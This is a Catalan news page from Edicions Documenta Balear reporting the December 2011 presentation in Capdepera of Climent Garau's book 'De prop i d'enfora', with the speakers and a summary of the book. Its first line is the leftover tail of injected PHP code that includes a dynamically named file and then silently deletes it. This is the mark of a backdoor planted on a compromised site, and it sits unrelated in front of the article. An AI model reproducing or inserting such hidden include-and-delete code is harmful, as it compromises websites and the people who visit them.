");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Presentat el llibre de Climent Garau
Cercador de Notícies
Calendari de notícies
19/12/2011 Cap Vermell

Presentat el llibre de Climent Garau

El passat dissabte dia 17, a la sala polivalent del Teatre Municipal de Capdepera, Climent Garau i Arbona presentà el recull titulat De prop i d'enfora, un nou projecte editorial de "Cap Vermell" i Edicions Documenta Balear que ara ha vist la llum. Un públic nombrós omplí  la sala en un acte d'abast literari, però també reivindicatiu i de reafirmació dels valors de la cultura.

Presentat per Jaume Fuster, l'acte, finalment, no pogué comptar amb la presència anunciada del prologuista de l'obra, Jaume Santandreu, a causa d'un sobtat problema de salut. En qualsevol cas, tot plegat va discórrer per viaranys de volada, gràcies a les intervencions de Pep Terrassa, qui va fer una aproximació al contingut del llibre; de Joana Colom, autora d'una nota introductòria al recull des del vessant  gabellí del seu autor; de Miquel Llull, tot glossant la figura de Climent Garau i la de tots els lluitadors per la dignitat d'aquesta terra i els seus trets d'identitat; i, finalment, del mateix autor, qui va reclamar respecte per tot allò que ens distingeix com a poble i ens aporta una visió única del món a partir de la nostra llengua i la nostra cultura mil·lenàries. Les intervencions íntegres den Pep, na Joana i en Miquel les teniu en vídeo al fina d'aquets article.

De prop i d'enfora, com d'alguna manera delata el títol, ofereix dos punts de vista de les relacions de l'autor amb allò que l'ha fet créixer com a persona i com a ciutadà. De prop, a partir de vivències directes, de persones conegudes, de fets concrets, inclosa la guerra civil: elements, en no pocs casos, entranyables, que ens resulten coneguts, familiars fins i tot, i amb els quals ens podem identificar perfectament. De prop vol dir reconèixer els orígens i estimar-los. D'aquesta primera part, n'havíem publicat la major part de capítols en aquesta revista.

D'enfora, per a Climent Garau, és mirar les coses amb els ulls de la consciència, amb els ulls de l'home de ciència que, això no obstant, o precisament per això mateix, té una visió transcendent de la vida;  a partir de de declarar-se creient, s'enfronta als valors religiosos des de la raó, amb la qual intenta conciliar-los. No hi manquen les referències al nostre ésser col·lectiu i a les peripècies que, com a poble, hem patit.

En definitiva, una obra que parteix ran de terra, com un arbre que xucla la saba de l'avior i acaba amb les branques cercant, cel amunt, elements que donin sentit a la nostra vida.

De prop i d'enfora el podreu trobar en els llocs de venda habituals.

Llegiu la notícia

Recomanar
Comentar
Comentaris (0)